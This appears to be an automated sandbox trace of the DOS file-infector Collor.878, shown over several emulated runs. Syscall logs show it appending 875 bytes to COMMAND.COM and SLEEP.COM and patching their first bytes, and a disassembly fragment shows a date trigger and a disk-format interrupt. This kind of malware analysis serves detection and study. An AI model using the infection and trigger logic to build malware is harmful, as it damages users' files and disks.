Sample viewer

vx.netlux.org/Virus.DOS.Collor.878


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:48.32651532Z 42 PC: 1c093 | Get date
0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-17T23:07:48.330275638Z 44 PC: 1c0a5 | Get time
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
0x1c0bf: mov cx, 0
0x1c0c2: mov dl, 0x80
0x1c0c4: mov dh, 0
0x1c0c6: mov ah, 7
0x1c0c8: int 0x13
0x1c0ca: ret
0x1c0cb: cmp dh, 2
0x1c0ce: jae 0x1c0d4
2018-12-17T23:07:48.333831411Z 71 PC: 1c153 | Get current directory
2018-12-17T23:07:48.337608952Z 26 PC: 1c15a | Set disk transfer address
2018-12-17T23:07:48.339692348Z 25 PC: 1c15e | Get default drive
2018-12-17T23:07:48.342117386Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-17T23:07:48.344744304Z 78 PC: 1c218 | Find first file
2018-12-17T23:07:48.351379557Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-17T23:07:48.358888401Z 66 PC: 1c274 | Move file pointer
2018-12-17T23:07:48.361100499Z 66 PC: 1c286 | Move file pointer
2018-12-17T23:07:48.363323899Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:48.367461917Z 66 PC: 1c2a0 | Move file pointer
2018-12-17T23:07:48.369619733Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.373158094Z 66 PC: 1c2b9 | Move file pointer
2018-12-17T23:07:48.376061873Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-17T23:07:48.723808659Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.727350848Z 87 PC: 1c325 | Get or set file date and time
2018-12-17T23:07:48.730434224Z 62 PC: 1c329 | Close file
2018-12-17T23:07:48.739679241Z 79 PC: 1c34d | Find next file
2018-12-17T23:07:48.742850382Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-17T23:07:48.746519018Z 78 PC: 1c218 | Find first file
2018-12-17T23:07:48.753401415Z 61 PC: 1c262 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:48.760707668Z 66 PC: 1c274 | Move file pointer
2018-12-17T23:07:48.762876295Z 66 PC: 1c286 | Move file pointer
2018-12-17T23:07:48.765643727Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:48.77316244Z 66 PC: 1c2a0 | Move file pointer
2018-12-17T23:07:48.775009873Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.77957828Z 66 PC: 1c2b9 | Move file pointer
2018-12-17T23:07:48.781614698Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-17T23:07:48.797290104Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:48.80362406Z 87 PC: 1c325 | Get or set file date and time
2018-12-17T23:07:48.807313415Z 62 PC: 1c329 | Close file
2018-12-17T23:07:48.816661396Z 79 PC: 1c34d | Find next file
2018-12-17T23:07:48.834702138Z 25 PC: 1c187 | Get default drive
2018-12-17T23:07:48.836858471Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-17T23:07:48.838839064Z 48 PC: 14f00 | Get DOS version
2018-12-17T23:07:48.841880171Z 2 PC: 13454 | Character output (Char = '56')
2018-12-17T23:07:48.844744704Z 2 PC: 13454 | Character output (Char = '65')
2018-12-17T23:07:48.847617354Z 2 PC: 13454 | Character output (Char = '72')
2018-12-17T23:07:48.851952743Z 2 PC: 13454 | Character output (Char = '73')
2018-12-17T23:07:48.855232128Z 2 PC: 13454 | Character output (Char = '61')
2018-12-17T23:07:48.858030578Z 2 PC: 13454 | Character output (Char = '6f')
2018-12-17T23:07:48.865285265Z 2 PC: 13454 | Character output (Char = '20')
2018-12-17T23:07:48.868089827Z 2 PC: 13454 | Character output (Char = '69')
2018-12-17T23:07:48.870991852Z 2 PC: 13454 | Character output (Char = '6e')
2018-12-17T23:07:48.874043939Z 2 PC: 13454 | Character output (Char = '63')
2018-12-17T23:07:48.878144697Z 2 PC: 13454 | Character output (Char = '6f')
2018-12-17T23:07:48.880774761Z 2 PC: 13454 | Character output (Char = '72')
2018-12-17T23:07:48.88318964Z 2 PC: 13454 | Character output (Char = '72')
2018-12-17T23:07:48.886620179Z 2 PC: 13454 | Character output (Char = '65')
2018-12-17T23:07:48.888958925Z 2 PC: 13454 | Character output (Char = '74')
2018-12-17T23:07:48.891293373Z 2 PC: 13454 | Character output (Char = '61')
2018-12-17T23:07:48.89469094Z 2 PC: 13454 | Character output (Char = '20')
2018-12-17T23:07:48.896999599Z 2 PC: 13454 | Character output (Char = '64')
2018-12-17T23:07:48.899301967Z 2 PC: 13454 | Character output (Char = '6f')
2018-12-17T23:07:48.902294142Z 2 PC: 13454 | Character output (Char = '20')
2018-12-17T23:07:48.906168895Z 2 PC: 13454 | Character output (Char = '44')
2018-12-17T23:07:48.908730029Z 2 PC: 13454 | Character output (Char = '4f')
2018-12-17T23:07:48.912076239Z 2 PC: 13454 | Character output (Char = '53')
2018-12-17T23:07:48.91443866Z 2 PC: 13454 | Character output (Char = '0d')
2018-12-17T23:07:48.919722392Z 2 PC: 13454 | Character output (Char = '0a')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":2,"TimeBased":true,"OriginalID":15982,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:00.878374109Z 42 PC: 1c093 | Get date
0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:00.882634536Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:00.886202722Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:00.887573949Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:00.889651845Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:00.891369998Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:00.897741406Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:00.904977486Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:00.906527656Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:00.908090744Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:00.912326491Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:00.913923115Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:00.916837977Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:00.918576071Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:01.263150389Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.266565142Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:01.268596735Z 62 PC: 1c329 | Close file
2018-12-25T12:45:01.276812686Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:01.279699758Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:01.281296512Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:01.28894262Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:01.297414606Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:01.298740523Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:01.300964782Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:01.308350469Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:01.310455315Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:01.315563917Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:01.318552275Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:01.334983076Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:01.36203153Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:01.364695187Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:01.373953387Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:01.377697265Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:01.379749698Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:01.381455665Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:01.386333374Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:01.393713586Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.397905472Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.402817347Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.405071376Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.407072436Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.409238671Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.411455438Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.413701503Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.41585078Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.419314374Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.421634566Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.42535299Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.428476982Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.431602407Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.434483741Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.437717537Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.440326187Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.442913304Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.446557354Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.449031099Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.451432109Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.454239519Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.456713967Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.458959736Z 2 PC: 13454 | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":2,"TimeBased":true,"OriginalID":15982,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:01.386936985Z 42 PC: 1c093 | Get date
0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:01.389011185Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:01.391947834Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:01.393750023Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:01.394756964Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:01.395839659Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:01.401714919Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:01.407642274Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:01.409263688Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:01.411431585Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:01.414260182Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:01.41584978Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.419296332Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:01.420815884Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:01.763300379Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.766936659Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:01.768374358Z 62 PC: 1c329 | Close file
2018-12-25T12:45:01.964214003Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:01.967205087Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:01.968348977Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:01.974150878Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:01.98099613Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:01.982427902Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:01.983742426Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:01.990398853Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:01.991660801Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:01.994089514Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:01.996058293Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:02.10834078Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:02.111001178Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:02.113048842Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:02.12045017Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:02.122964819Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:02.125586516Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:02.12664977Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:02.12802741Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:02.131362881Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.133495639Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.136454094Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.138765645Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.156293129Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.158440591Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.160692066Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.163197332Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.165490625Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.168120136Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.170293332Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.172664407Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.175746154Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.178023012Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.180205272Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.183114198Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.185499763Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.187868161Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.19154885Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.193894069Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.196296594Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.199342363Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.201731648Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.204174316Z 2 PC: 13454 | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15982,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:01.647239171Z 42 PC: 1c093 | Get date
0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:01.64989754Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:01.652402465Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:01.653334085Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:01.65466961Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:01.655558425Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:01.660624141Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:01.666552661Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:01.667774052Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:01.668865233Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:01.671627375Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:01.672789783Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.675200085Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:01.677038196Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:02.108019104Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:02.111532878Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:02.113533008Z 62 PC: 1c329 | Close file
2018-12-25T12:45:02.120396334Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:02.124175609Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:02.126426445Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:02.132558518Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:02.141140811Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:02.143733075Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:02.145390678Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:02.151985096Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:02.153914041Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:02.156546272Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:02.158218631Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:02.176773808Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:02.179176523Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:02.181110953Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:02.188287061Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:02.192582926Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:02.194485999Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:02.195657327Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:02.19791044Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:02.199987456Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.202003755Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.205069028Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.207403856Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.209754852Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.213104802Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.215183665Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.217189662Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.219493459Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.221668321Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.223597628Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.226004246Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.227915551Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.229791581Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.232714458Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.235085416Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.237387987Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.240510745Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.24258075Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.244523042Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.246904684Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.248899005Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.250878802Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.253461804Z 2 PC: 13454 | Character output (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15982,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:01.47777514Z 42 PC: 1c093 | Get date
0x1c093: cmp cx, 0x7c8
0x1c097: jge 0x1c0a1
0x1c099: cmp dh, 6
0x1c09c: jae 0x1c0a1
0x1c09e: jmp 0x1c0d4
0x1c0a0: nop
0x1c0a1: mov ah, 0x2c
0x1c0a3: int 0x21
0x1c0a5: cmp dh, 1
0x1c0a8: jae 0x1c0cb
0x1c0aa: mov si, 0xffb0
0x1c0ad: mov dl, byte ptr [si]
0x1c0af: or dl, dl
0x1c0b1: je 0x1c0ba
0x1c0b3: mov ah, 2
0x1c0b5: int 0x21
0x1c0b7: inc si
0x1c0b8: jmp 0x1c0ad
0x1c0ba: mov al, 0x10
0x1c0bc: mov bx, 0
2018-12-25T12:45:01.481096752Z 71 PC: 1c153 | Get current directory
2018-12-25T12:45:01.484468159Z 26 PC: 1c15a | Set disk transfer address
2018-12-25T12:45:01.486008778Z 25 PC: 1c15e | Get default drive
2018-12-25T12:45:01.488812423Z 14 PC: 1c169 | Set default drive (Drive = 'C')
2018-12-25T12:45:01.490531651Z 78 PC: 1c218 | Find first file
2018-12-25T12:45:01.496901628Z 61 PC: 1c262 | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:45:01.50495328Z 66 PC: 1c274 | Move file pointer
2018-12-25T12:45:01.506616815Z 66 PC: 1c286 | Move file pointer
2018-12-25T12:45:01.508155944Z 63 PC: 1c290 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:45:01.512175879Z 66 PC: 1c2a0 | Move file pointer
2018-12-25T12:45:01.513634742Z 64 PC: 1c2af | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.516536292Z 66 PC: 1c2b9 | Move file pointer
2018-12-25T12:45:01.521923932Z 64 PC: 1c308 | Write file or device (Write 875 bytes on handle 5)
2018-12-25T12:45:01.877695739Z 64 PC: 1c314 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:45:01.882025011Z 87 PC: 1c325 | Get or set file date and time
2018-12-25T12:45:01.884178505Z 62 PC: 1c329 | Close file
2018-12-25T12:45:01.892086423Z 79 PC: 1c34d | Find next file
2018-12-25T12:45:01.894748467Z 14 PC: 1c178 | Set default drive (Drive = 'A')
2018-12-25T12:45:01.902552311Z 78 PC: 1c218 | Find first file (See above)
2018-12-25T12:45:01.909715043Z 61 PC: 1c262 | Open file (See above)
2018-12-25T12:45:01.91690731Z 66 PC: 1c274 | Move file pointer (See above)
2018-12-25T12:45:01.919116243Z 66 PC: 1c286 | Move file pointer (See above)
2018-12-25T12:45:01.920590124Z 63 PC: 1c290 | Read file or device (See above)
2018-12-25T12:45:01.927477623Z 66 PC: 1c2a0 | Move file pointer (See above)
2018-12-25T12:45:01.930033183Z 64 PC: 1c2af | Write file or device (See above)
2018-12-25T12:45:01.932955758Z 66 PC: 1c2b9 | Move file pointer (See above)
2018-12-25T12:45:01.934766533Z 64 PC: 1c308 | Write file or device (See above)
2018-12-25T12:45:01.952089191Z 64 PC: 1c314 | Write file or device (See above)
2018-12-25T12:45:01.954876551Z 87 PC: 1c325 | Get or set file date and time (See above)
2018-12-25T12:45:01.956229747Z 62 PC: 1c329 | Close file (See above)
2018-12-25T12:45:01.96552272Z 79 PC: 1c34d | Find next file (See above)
2018-12-25T12:45:01.968849209Z 25 PC: 1c187 | Get default drive
2018-12-25T12:45:01.970534017Z 99 PC: 14eec | Get DBCS lead byte table pointer
2018-12-25T12:45:01.972506249Z 48 PC: 14f00 | Get DOS version
2018-12-25T12:45:01.974202755Z 2 PC: 13454 | Character output (Char = '56')
2018-12-25T12:45:01.976631715Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.979156502Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.981849094Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.983969948Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.986183423Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.988517658Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.990718739Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.992991626Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.995438504Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.997527747Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:01.999844648Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.002704277Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.00505357Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.007797947Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.010735234Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.012961665Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.015137661Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.018368489Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.020581665Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.02284904Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.025512341Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.02773509Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.029942465Z 2 PC: 13454 | Character output (See above)
2018-12-25T12:45:02.032528212Z 2 PC: 13454 | Character output (See above)